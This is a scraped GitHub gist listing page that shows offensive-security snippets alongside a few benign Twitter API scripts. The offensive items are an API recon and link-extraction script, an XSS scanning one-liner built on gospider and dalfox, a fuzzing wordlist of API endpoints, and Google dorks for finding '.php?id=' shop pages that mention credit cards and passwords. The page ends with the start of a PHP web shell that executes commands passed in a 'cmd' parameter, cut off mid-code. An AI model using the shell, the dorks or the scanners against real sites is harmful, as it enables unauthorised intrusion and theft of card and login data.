Skip to content

Instantly share code, notes, and snippets.

View thezakman's full-sized avatar
🏡
Working from home

Pedro Araujo thezakman

🏡
Working from home
57 followers · 76 following
View GitHub Profile
@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
@nullenc0de
nullenc0de / api-linkfinder.yaml
Created August 7, 2021 11:14
id: api-linkfinder
info:
name: API Recon
author: nullenc0de
severity: info
tags: file
requests:
- method: GET
@joaomacalos
joaomacalos / hashtag2.py
Created May 1, 2021 13:57
hashtag2-defapi
# Query
query = "SuperLeague OR #SuperLeague -filter:retweets"
def collect_tweets(query, max_id=None, nitems=100, until=None, result_type='recent'):
if until is not None:
tweets = tweepy.Cursor(api.search,
q=query,
lang="en",
tweet_mode="extended",
@cihanmehmet
cihanmehmet / xss_one_liner.md
Last active July 27, 2024 03:17
xss_one_liner.md 
#cat targets_urls.txt                
http://public-firing-range.appspot.com

Command Line

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
@clapbr
clapbr / app.py
Last active August 13, 2021 03:07
flask monkeyrunner http remote PoC (don't use this in production)
from flask import Flask
from flask_restful import Resource, Api, reqparse
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice
from apscheduler.schedulers.background import BackgroundScheduler
import time
import subprocess
app = Flask(__name__)
api = Api(app)
@epikulski
epikulski / app-only-twitter.py
Last active May 14, 2021 00:53
Set up app-only authentication on Twitter
"""
Scratch pad for experimenting with the twitter API.
"""
import base64
import os
import requests
from requests_oauthlib import OAuth1
"""
SECRETS
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active May 24, 2025 19:23
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@vmanoilov
vmanoilov / gist:6a5d09cf958475f2115ea3fe01b61d4b
Created September 24, 2019 11:42
dorks 2018
ntext:"bri".php?id= intext:"Credit Card" site:.com
intext:"kartu kredit".php?id= intext:"Username" site:.com
intext:"bayar dengan kartu kredit".php?id= intext:"Password" site:.com
intitle:"bayar dengan kartu kredit".php?id= title:shop intext:"Credit Card" site:.com
intitle:"human".php?id= title:education intext:"Username" site:.com
intitle:"Publications".php?id= title:login intext:"Password" site:.com
intitle:"project".php?id= title:join intext:"Username" site:.com
intitle:"trade".php?id= title:orders intext:"Username" site:.com
@joswr1ght
joswr1ght / easy-simple-php-webshell.php
Last active May 28, 2025 12:45
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{